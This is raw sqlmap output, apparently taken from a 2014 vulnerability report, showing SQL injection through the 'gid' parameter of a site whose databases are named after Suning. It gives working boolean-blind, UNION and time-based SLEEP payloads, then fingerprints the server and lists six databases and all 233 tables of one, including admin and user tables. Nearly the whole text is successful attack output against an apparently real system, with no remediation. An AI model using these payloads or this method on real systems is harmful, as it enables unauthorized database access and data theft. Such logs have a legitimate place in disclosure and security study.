sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: GET
Parameter: gid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gid=4 AND 4558=4558&cid=190
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: gid=4 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6274773a,0x574251536c4671566759,0x3a7566613a), NULL, NULL#&cid=190
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: gid=4 AND SLEEP(5)&cid=190
[17:08:16] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[17:08:16] [INFO] fetching database names
[17:08:16] [WARNING] reflective value(s) found and filtering out
available databases [6]:
[*] information_schema
[*] suning
[*] suning_app_inner
[*] suning_ios
[*] suning_win
[*] test
Database: suning
[233 tables]
| Permission |
| action |
| activity |
| ad_indexfocus_img |
| ad_indexsoft |
| admin_group |
| admin_module |
| admin_promotion |
| admin_user |
| admin_user_new |
| app_client |
| app_count_app_day |
| app_count_app_hour |
| app_count_detail |
| app_count_device_day |
| app_count_mobile_day |
| app_count_user_day |
| app_device |
| app_imei |
| app_push_apps |
| app_push_log |
| app_software |
| app_sys |
| app_sys_cmd |
| app_temp |
| authorize |
| brand_ext_inner_map |
| brand_external |
| brand_mobile_ext |
| brand_model_map |
| bug_word |
| category |
| category_anzhi |
| category_icon |
| cloud_bootscreen |
| cloud_qrcode_statistics |
| cloud_res |
| ctrl |
| ctrl_copy |
| ctrltype |
| ctrltype_copy |
| department |
| developer |
| developer_appeal |
| developer_msg |
| device_info |
| device_statistics |
| district_day |
| district_hour |
| district_month |
| district_tol |
| district_week |
| down_detail |
| download |
| download_all |
| download_day |
| download_hour |
| download_month |
| download_tol |
| download_week |
| ego_ad_indexfocus_img |
| ego_ad_indexsoft |
| favority |
| feedback |
| feedback_detail |
| friend_links |
| game_ad_indexfocus_img |
| game_ad_indexsoft |
| game_download_all |
| game_download_day |
| game_download_hour |
| game_download_month |
| game_download_tol |
| game_guess |
| game_soft_ranking |
| game_topic |
| game_topic_info |
| group |
| guess |
| h5_category |
| h5_download_day |
| h5_download_hour |
| h5_download_month |
| h5_download_tol |
| h5_maintain_soft |
| h5_soft_tag |
| h5_software |
| h5_tag |
| http_log |
| imei_day |
| imei_hour |
| imei_month |
| imei_tol |
| install_day |
| install_hour |
| install_month |
| install_tol |
| install_week |
| ip_visit |
| keyword |
| list_column |
| log |
| logo_icon |
| manager |
| market |
| market_ad |
| market_cate |
| market_channel |
| market_channel_day |
| market_imei_channel |
| mobile_brand |
| model_drive |
| model_feedback |
| msg |
| msg_forbid |
| news |
| news_app_map |
| news_class |
| news_comment |
| order_soft |
| os_day |
| os_hour |
| os_month |
| os_tol |
| os_week |
| outer_category |
| page_ad_indexfocus_img |
| people_need |
| people_recommend |
| privilege |
| push_id |
| push_software |
| qrcode_channel |
| qrcode_channel_bak |
| qrcode_channel_url |
| qrcode_channel_url_bak |
| quick_entry |
| ratio_day |
| ratio_hour |
| ratio_month |
| ratio_tol |
| ratio_week |
| recommend |
| report |
| role_user |
| score |
| search_day |
| search_keywords |
| search_month |
| search_soft |
| search_soft_bak20140417 |
| search_tol |
| search_week |
| sms_statistics |
| sn_software |
| soft_guess |
| soft_ranking |
| soft_tag |
| soft_ver_log |
| software |
| software_bak20131017 |
| software_copy |
| software_log |
| software_log_copy |
| software_permission |
| software_pool |
| software_safe |
| spread_money |
| spread_operation |
| spread_promotion_goods |
| spread_promotion_setting |
| spread_reward |
| spread_soft_count_day |
| spread_software |
| spread_supplier |
| suit_feedback |
| suit_statistics |
| suit_statistics_day |
| suit_statistics_hour |
| suit_statistics_month |
| suit_version |
| suning_district |
| suning_store |
| suning_user |
| supplier |
| sys_ad |
| sys_ad_stat |
| sys_ad_stat_day |
| sys_brand |
| sys_brand_info |
| sys_cate |
| sys_soft |
| sys_topic |
| sys_topic_info |
| sys_word |
| tag |
| tag_app_map |
| temporary |
| term_district_day |
| term_district_hour |
| term_district_month |
| term_district_tol |
| term_imei |
| term_imei_day |
| term_imei_hour |
| term_imei_month |
| term_imei_tol |
| term_install |
| term_install_old |
| term_install_testlog |
| term_model_day |
| term_model_hour |
| term_model_month |
| term_model_tol |
| term_os_day |
| term_os_hour |
| term_os_month |
| term_os_tol |
| term_ratio_day |
| term_ratio_hour |
| term_ratio_month |
| term_ratio_tol |
| term_stat_by_imei_day |
| term_stat_by_pack |
| term_stat_by_pack_model |
| topic |
| topic_info |
| updatesoft_log |
| verify_reason |
| web |
| web_ad |
| web_notice |
| web_tag |
确认时间:2014-05-09 18:06